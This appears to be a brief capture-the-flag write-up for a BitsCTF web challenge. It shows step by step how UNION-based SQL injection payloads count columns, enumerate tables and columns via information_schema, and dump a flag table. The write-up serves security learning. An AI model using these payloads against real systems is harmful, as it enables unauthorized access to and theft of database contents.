[BITSCTF]Batman vs Joker[WEB][30pts]

This challenge is from BitsCTF :

This is a SQL injection, let’s find the number of columns by entering ‘ union select 1,….” until it doesnt throw an error, the number of collums is 2 :

Then we need to find the name of the tables with this query :

' union select table_name,2 from information_schema.columns -- - 

pour récupérer le nom des tables de la base de données, la table Joker a l’air interessante j’envoie donc cette chaîne pour lister les colonnes de la table

The “Joker” table seems interesting, let’s find the collumns of the table :

' union select column_name,2 from information_schema.columns where table_name = 'Joker' -- -

 

Let’s dump the table to print the “Flag” columns’s value from the table

' union select flag,HaHaHa from Joker -- -

The flag is : BITSCTF{wh4t_d03snt k1ll y0u, s1mply m4k3s y0u str4ng3r!} !

Leave a Reply

Your email address will not be published.